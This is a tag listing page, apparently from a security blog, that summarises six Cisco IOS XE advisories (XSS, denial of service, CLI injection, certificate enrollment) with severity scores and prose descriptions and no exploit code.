Posts for: #16.11.1

Cisco IOS XE Software Web Authentication Reflected Cross-Site Scripting Vulnerability

🚨 SEVERITY: MEDIUM — CVSS 6.1 Security Advisory

TL;DR 📌

A reflected cross-site scripting (XSS) vulnerability has been identified in the Web Authentication feature of Cisco IOS XE Software. This issue could allow an unauthenticated remote attacker to execute malicious scripts on affected devices. Cisco has released updates to address this vulnerability, but there are no workarounds available.

What happened 🕵️‍♂️

A vulnerability in the Web Authentication feature of Cisco IOS XE Software allows an unauthenticated remote attacker to conduct a reflected cross-site scripting (XSS) attack. This vulnerability arises from improper sanitization of user-supplied input. An attacker could exploit this by persuading a user to click a malicious link, potentially allowing the attacker to steal user cookies from the affected device.

[]

Cisco IOS XE Software for Catalyst 9000 Series Switches Denial of Service Vulnerability

🚨 SEVERITY: HIGH — CVSS 7.4 Security Advisory

TL;DR 📌

A denial of service vulnerability has been identified in Cisco IOS XE Software for Catalyst 9000 Series Switches. An unauthenticated, adjacent attacker can exploit this vulnerability by sending crafted Ethernet frames, causing an egress port to drop all outbound traffic. The highest CVSS score is 7.4 (High). Cisco has released fixed software, but no workarounds are available.

What happened 🕵️‍♂️

A vulnerability exists in the handling of certain Ethernet frames within Cisco IOS XE Software for Catalyst 9000 Series Switches. This flaw allows an unauthenticated, adjacent attacker to send crafted Ethernet frames, which can block an egress port, resulting in a denial of service (DoS) condition. Once exploited, the affected port will drop all outbound traffic, severely impacting network operations.

[]

Cisco IOS XE Software CLI Argument Injection Vulnerability

🚨 SEVERITY: MEDIUM — CVSS 6.0 Security Advisory

TL;DR 📌

A medium-severity vulnerability has been identified in Cisco IOS XE Software that allows authenticated local attackers with administrative privileges to execute arbitrary commands on the underlying operating system. No workarounds are available, and users are advised to upgrade to fixed software as soon as possible.

What happened 🕵️‍♂️

A vulnerability in the Command-Line Interface (CLI) of Cisco IOS XE Software could allow an authenticated local attacker with administrative privileges to execute arbitrary commands as root on the affected device’s operating system. This issue arises from insufficient validation of user arguments passed to specific CLI commands. An attacker could exploit this by logging in with valid administrative credentials and using crafted commands.

[]

Cisco IOS XE Software Network-Based Application Recognition Denial of Service Vulnerability

🚨 SEVERITY: HIGH — CVSS 8.6 Security Advisory

TL;DR 📌

A high-severity vulnerability has been identified in the Network-Based Application Recognition (NBAR) feature of Cisco IOS XE Software. This flaw could allow unauthenticated remote attackers to cause affected devices to reload, resulting in a denial of service (DoS) condition. Cisco has released fixed software, but there are no workarounds available.

What happened 🕵️‍♂️

A vulnerability in the NBAR feature of Cisco IOS XE Software allows unauthenticated, remote attackers to exploit improperly handled malformed Control and Provisioning of Wireless Access Points (CAPWAP) packets. By sending these malformed packets, an attacker can cause the affected device to unexpectedly reload, leading to a denial of service (DoS).

[]

Cisco IOS XE Software Web UI Reflected Cross-Site Scripting Vulnerability

🚨 SEVERITY: MEDIUM — CVSS 6.1 Security Advisory

TL;DR 📌

A reflected cross-site scripting (XSS) vulnerability has been identified in the web UI of Cisco IOS XE Software. This flaw could allow unauthenticated remote attackers to execute malicious scripts on affected devices. Cisco has released software updates to address this issue, but no workarounds are available.

What happened 🕵️‍♂️

A vulnerability in the web UI of Cisco IOS XE Software has been discovered, allowing unauthenticated remote attackers to conduct reflected cross-site scripting (XSS) attacks. This vulnerability arises from improper sanitization of user-supplied input, enabling attackers to trick users into clicking malicious links. A successful exploit could allow attackers to steal user cookies from affected devices.

[]

Cisco IOS XE Software for Catalyst 9800 Series Wireless Controller for Cloud Unauthenticated Access to Certificate Enrollment Service Vulnerability

🚨 SEVERITY: MEDIUM — CVSS 5.3 Security Advisory

TL;DR 📌

A medium-severity vulnerability has been identified in the Cisco IOS XE Software for Catalyst 9800 Series Wireless Controllers for Cloud. This flaw allows unauthenticated remote attackers to access the public-key infrastructure (PKI) server, potentially enabling unauthorized device enrollment. Workarounds are available, and Cisco has recommended software updates to fully mitigate the risk.

What happened 🕵️‍♂️

A vulnerability in the Day One setup process of Cisco IOS XE Software for Catalyst 9800 Series Wireless Controllers for Cloud could allow an unauthenticated, remote attacker to access the PKI server running on affected devices. This issue arises due to incomplete cleanup after the Day One setup process. An attacker could exploit this vulnerability by sending Simple Certificate Enrollment Protocol (SCEP) requests, potentially allowing them to request a certificate and join an attacker-controlled device to the virtual wireless controller.

[]